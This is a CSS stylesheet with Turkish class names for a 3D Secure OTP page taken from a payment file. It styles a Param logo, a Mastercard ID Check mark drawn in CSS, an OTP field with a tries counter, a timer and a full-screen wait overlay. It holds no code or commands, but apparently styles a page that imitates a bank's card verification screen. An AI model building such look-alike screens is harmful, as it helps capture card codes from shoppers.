/* 3D Doğrulama (3D Secure) sayfası stilleri - odeme.php inline'dan ayrıştırıldı */
.dogrulama-page *{box-sizing:border-box;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Arial,sans-serif;margin:0;padding:0}
.page.dogrulama-page.active{background:#f3f5f8;min-height:100vh;display:flex;justify-content:center;padding:30px 10px}
.dogrulama-page .dg-container{width:390px;background:#fff;border-radius:18px;padding:22px;box-shadow:0 2px 10px rgba(0,0,0,.08);height:fit-content}
.dogrulama-page .dg-header{display:flex;justify-content:space-between;align-items:center;margin-bottom:22px;padding-bottom:10px}
.dogrulama-page .header-left{display:flex;align-items:center}
.dogrulama-page .param-logo{height:24px;width:auto;object-fit:contain}
.dogrulama-page .header-right{display:flex;align-items:center;gap:10px}
.dogrulama-page .mastercard-logo{display:flex;position:relative;width:48px;height:30px}
.dogrulama-page .mc-circle{width:30px;height:30px;border-radius:50%;position:absolute}
.dogrulama-page .mc-orange{background-color:#ff5f00;left:0;z-index:1}
.dogrulama-page .mc-red{background-color:#eb001b;left:18px;z-index:0;opacity:.85}
.dogrulama-page .id-check-title{font-size:18px;font-weight:600;color:#2f2f2f}
.dogrulama-page .dg-card{background:#f7f8fb;border-radius:16px;padding:20px;margin-bottom:18px}
.dogrulama-page .row{display:flex;margin-bottom:12px;font-size:14px}
.dogrulama-page .row:last-child{margin-bottom:0}
.dogrulama-page .label{width:110px;text-align:right;padding-right:10px;font-weight:600;color:#2f2f2f;flex-shrink:0}
.dogrulama-page .value{flex:1;color:#7a8a97;font-weight:500;white-space:nowrap}
.dogrulama-page .verification-card{background:#fff;border:1px solid #eee}
.dogrulama-page .info{font-size:14px;color:#777;margin-bottom:12px;line-height:1.5}
.dogrulama-page .info strong{color:#2f2f2f;font-weight:700}
.dogrulama-page .ref{font-size:14px;margin-bottom:16px;color:#555;line-height:1.5}
.dogrulama-page .ref strong{color:#2f2f2f;font-weight:700}
.dogrulama-page input{width:100%;padding:15px;border-radius:14px;border:1px solid #ddd;font-size:15px;margin-bottom:16px;outline:none;transition:border-color .2s;text-align:center}
.dogrulama-page input:focus{border-color:#4b148b}
.dogrulama-page input::placeholder{color:#aaa}
.dogrulama-page .primary{width:100%;padding:16px;border-radius:16px;border:none;background:#4b148b;color:#fff;font-size:16px;font-weight:700;cursor:pointer;transition:background .2s;display:flex;align-items:center;justify-content:center}
.dogrulama-page .primary:hover{background:#3d1073}
.dogrulama-page .primary:active{background:#2f0c5a}
.dogrulama-page .primary:disabled{opacity:.7;cursor:not-allowed}
.dogrulama-page .btn-spinner{width:20px;height:20px;border:3px solid rgba(255,255,255,.3);border-top:3px solid #fff;border-radius:50%;animation:dg-spin 1s linear infinite}
@keyframes dg-spin{0%{transform:rotate(0)}100%{transform:rotate(360deg)}}
.dogrulama-page .timer{text-align:center;margin-top:14px;color:#555;font-weight:500;font-size:14px}
.dogrulama-page .timer-value{color:#6a2bbd;font-weight:700}
.dogrulama-page .dg-footer{display:flex;gap:12px;margin-top:8px}
.dogrulama-page .dg-footer button{flex:1;padding:14px;border-radius:14px;border:none;background:#eef1f4;font-size:14px;font-weight:500;color:#333;cursor:pointer;transition:background .2s}
.dogrulama-page .dg-footer button:hover{background:#e0e4e8}
.dogrulama-page .dg-footer button:active{background:#d0d4d8}
.dogrulama-page .otp-error{display:none;text-align:center;margin-bottom:12px;font-size:14px}
.dogrulama-page .otp-error.show{display:block}
.dogrulama-page .otp-error .err-strong{color:#d32f2f;font-weight:700;display:block;margin-bottom:2px}
.dogrulama-page .otp-error .err-tries{color:#d32f2f;font-weight:700}
.dogrulama-page .wait-wrap{position:fixed;inset:0;display:grid;place-items:center;padding:24px;background:#fff;z-index:9999}
.dogrulama-page .wait-inner{text-align:center}
.dogrulama-page .spinner-loading{border:4px solid #f3f3f3;border-top:4px solid #4b148b;border-radius:50%;width:48px;height:48px;animation:dg-spin 1s linear infinite;margin:0 auto 12px}
.dogrulama-page .dg-hidden{display:none!important}
